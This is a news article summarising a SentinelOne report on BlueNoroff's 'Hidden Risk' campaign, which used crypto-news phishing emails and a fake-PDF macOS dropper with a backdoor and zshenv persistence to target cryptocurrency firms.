North Korean Hacker BlueNoroff Target Crypto Firms with Malware

Key Takeaways

• The attack uses a multi-stage malware designed to infect Apple’s macOS devices, aiming to compromise crypto firms.
• The attackers use phishing emails disguised as crypto news alerts to trick victims into downloading malware.

A North Korean hacking group, linked to the state-backed BlueNoroff operation, has launched a new cyber campaign targeting cryptocurrency firms, according to a recent report by SentinelOne. Dubbed Hidden Risk, this attack uses a multi-stage malware designed to infect Apple’s macOS devices, aiming to compromise crypto firms.

BlueNoroff has previously deployed malware like RustBucket and ObjCShellz. This time, the hackers use phishing emails disguised as crypto news alerts to trick victims into downloading malware. The campaign, first noticed in October 2024 but potentially active since July, involves lures such as “Hidden Risk Behind New Surge of Bitcoin Price” and “Altcoin Season 2.0 – The Hidden Gems to Watch.” These emails, which appear to share news on cryptocurrency trends, prompt users to click on malicious links.

As per the SentinelOne researchers, hackers impersonated real people from unrelated industries, making their phishing attempts seem more legitimate. In one instance, the attackers copied a genuine academic paper titled “Bitcoin ETF: Opportunities and Risks,” adding credibility to their scam. The phishing emails used the domain kalpadvisory[.]com, which has been flagged for spam in Indian financial forums.

Unlike BlueNoroff’s previous campaigns, which often involved complex social media engagement, Hidden Risk relies on simpler email-based phishing tactics. The malware is delivered as a dropper application mimicking a PDF file, written in Swift and initially signed with a valid Apple developer ID. The application, named “Hidden Risk Behind New Surge of Bitcoin Price.app,” was notarized by Apple on October 19, 2024, before its signature was revoked.

Once the malware is activated, it downloads a decoy PDF while secretly retrieving a second-stage payload from a remote server. This payload is a backdoor, enabling the attackers to execute commands remotely. The malware also uses a unique persistence method through the zshenv configuration file, bypassing macOS notifications for background activities, making it harder to detect.

SentinelOne’s report warns that these tactics reflect North Korean hackers’ ability to adapt and exploit new vulnerabilities. The U.S. FBI had previously issued a warning in September 2024 about similar campaigns using social engineering tactics to target decentralized finance (DeFi) and crypto sectors.